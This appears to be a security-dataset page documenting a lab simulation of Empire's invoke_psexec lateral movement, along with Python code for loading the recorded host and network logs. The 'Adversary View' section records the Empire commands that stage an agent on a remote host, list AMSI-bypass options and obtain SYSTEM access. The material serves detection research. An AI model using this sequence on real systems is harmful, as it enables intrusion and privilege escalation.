Empire Invoke PsExec
Contents
Empire Invoke PsExec#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
RPC CreateService,RPC StartService,TCP Svcctl |
Dataset Description#
This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 16:13:06 http
(Empire: agents) > interact UF5MYK42
(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_psexec) > execute
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_psexec) > info
Name: Invoke-PsExec
Module: powershell/lateral_movement/invoke_psexec
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
@harmj0y
Description:
Executes a stager on remote hosts using PsExec type
functionality.
Comments:
https://github.com/rapid7/metasploit-
framework/blob/master/tools/psexec.rb
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True UF5MYK42 Agent to run module on.
Listener False Listener to use.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
ComputerName True ComputerName WORKSTATION6.theshire.local Host to execute the stager on.
ServiceName True Updater The name of the service to create.
Command False Custom command to execute on remote
hosts.
ResultFile False Name of the file to write the results to
on agent machine.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/lateral_movement/invoke_psexec) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked UF5MYK42 to run TASK_CMD_JOB
[*] Agent UF5MYK42 tasked with task ID 1
[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) >
Job started: RNU5DY
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent 9CMNYX72 checked in
[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6
(Empire: powershell/lateral_movement/invoke_psexec) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 16:17:06 http
9CMNYX72 ps 172.18.39.6 WORKSTATION6 *THESHIRE\SYSTEM powershell 4312 5/0.0 2020-09-20 16:17:08 http
(Empire: agents) > interact 9CMNYX72
(Empire: 9CMNYX72) > shell whoami
[*] Tasked 9CMNYX72 to run TASK_SHELL
[*] Agent 9CMNYX72 tasked with task ID 1
(Empire: 9CMNYX72) >
nt authority\system
..Command execution completed.
(Empire: 9CMNYX72) > back
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)